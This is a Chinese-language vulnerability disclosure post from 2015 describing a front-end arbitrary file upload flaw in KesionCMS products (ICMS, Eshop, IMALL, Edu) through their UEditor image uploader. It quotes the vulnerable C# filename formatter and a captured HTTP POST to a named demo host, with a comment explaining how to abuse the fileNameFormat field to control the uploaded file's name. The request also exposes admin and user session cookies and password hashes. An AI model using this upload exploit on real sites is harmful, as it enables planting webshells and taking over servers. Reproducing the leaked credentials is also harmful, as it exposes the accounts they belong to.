KesionCMS多系统前台上传漏洞

作者：hack1990 时间：15-06-01 阅读数：1489人阅读

KesionICMS 智能建站系统 V2.5

KesionEshop 在线商城系统 X1.0.141206

KesionIMALL 在线商城系统 V2.5

KesionEdu 网校培训系统 V2.5

由于上述系统前台均采用UEditor编辑器 //应该是二次开发的造成此漏洞

publicstaticclassNameFormater

{

publicstaticstringFormat(stringformat,stringfilename)

{

if(String.IsNullOrEmpty(format))

{

format="{filename}{rand:6}";

}

stringext=Path.GetExtension(filename);

filename=Path.GetFileNameWithoutExtension(filename);

format=format.Replace("{filename}",filename);

format=newRegex(@"\{rand(\:?)(\d+)\}",RegexOptions.Compiled).Replace(format,newMatchEvaluator(delegate(Match match)

{

intdigit=6;

if(match.Groups.Count>2)

{

digit=Convert.ToInt32(match.Groups[2].Value);

}

Random rand=newRandom();

returnrand.Next((int)Math.Pow(10,digit),(int)Math.Pow(10,digit+1)).ToString();

}));

format=format.Replace("{time}",DateTime.Now.Ticks.ToString());

format=format.Replace("{yyyy}",DateTime.Now.Year.ToString());

format=format.Replace("{yy}",(DateTime.Now.Year%100).ToString("D2"));

format=format.Replace("{mm}",DateTime.Now.Month.ToString("D2"));

format=format.Replace("{dd}",DateTime.Now.Day.ToString("D2"));

format=format.Replace("{hh}",DateTime.Now.Hour.ToString("D2"));

format=format.Replace("{ii}",DateTime.Now.Minute.ToString("D2"));

format=format.Replace("{ss}",DateTime.Now.Second.ToString("D2"));

Regex invalidPattern=newRegex(@"[\\\/\:\*\?\042\<\>\|]");

format=invalidPattern.Replace(format,"");

returnformat+ext;

}

抓包

XHTML

POST /plus/ueditor/imageUp.ashx HTTP/1.1 Host: demo.bkwy.org Proxy-Connection: keep-alive Content-Length: 824 Cache-Control: no-cache Origin: http://demo.bkwy.org User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36 Content-Type: multipart/form-data; boundary=tmbtrfjfrrifujwmvskngarqwewwieuo Accept: */* Referer: http://demo.bkwy.org/ueditor/dialogs/image/imageUploader.swf Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: Admin=AdminID=76&AdminUser=admin&AdminPass=469e80d32c0559f8&UserType=1&PowerList=&DocPower=1&AdminLoginCode=; myShop=userName=iz8ez4tgy5gw; myViewRecord=userName=6jmr6hlgq7r9; ASP.NET_SessionId=wfkb2dffjuvnzauyqfpacemj; CheckCode=44T2L; User=userid=191&username=test&password=49ba59abbe56e057&RndPassword=K1P6WLJ957L2NCCPH1SX --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="fileName" 0000.gif --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="dir" /UploadFiles/2015-3/76 --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="Filename" 0000.gif --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="pictitle" 0000.gif --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="fileNameFormat" {time}{rand:6} //这里是后缀前的时间可以修改成随意东西除了asp asa aspx几个敏感东西 --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="upfile"; filename="0000.gif" Content-Type: application/octet-stream xxxxxx --tmbtrfjfrrifujwmvskngarqwewwieuo Content-Disposition: form-data; name="Upload" Submit Query --tmbtrfjfrrifujwmvskngarqwewwieuo--

POST/plus/ueditor/imageUp.ashxHTTP/1.1

Host:demo.bkwy.org

Proxy-Connection:keep-alive

Content-Length:824

Cache-Control:no-cache

Origin:http://demo.bkwy.org

User-Agent:Mozilla/5.0(WindowsNT6.3;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/38.0.2125.101Safari/537.36

Content-Type:multipart/form-data;boundary=tmbtrfjfrrifujwmvskngarqwewwieuo

Accept:*/*

Referer:http://demo.bkwy.org/ueditor/dialogs/image/imageUploader.swf

Accept-Encoding:gzip,deflate

Accept-Language:zh-CN,zh;q=0.8

Cookie:Admin=AdminID=76&AdminUser=admin&AdminPass=469e80d32c0559f8&UserType=1&PowerList=&DocPower=1&AdminLoginCode=;myShop=userName=iz8ez4tgy5gw;myViewRecord=userName=6jmr6hlgq7r9;ASP.NET_SessionId=wfkb2dffjuvnzauyqfpacemj;CheckCode=44T2L;User=userid=191&username=test&password=49ba59abbe56e057&RndPassword=K1P6WLJ957L2NCCPH1SX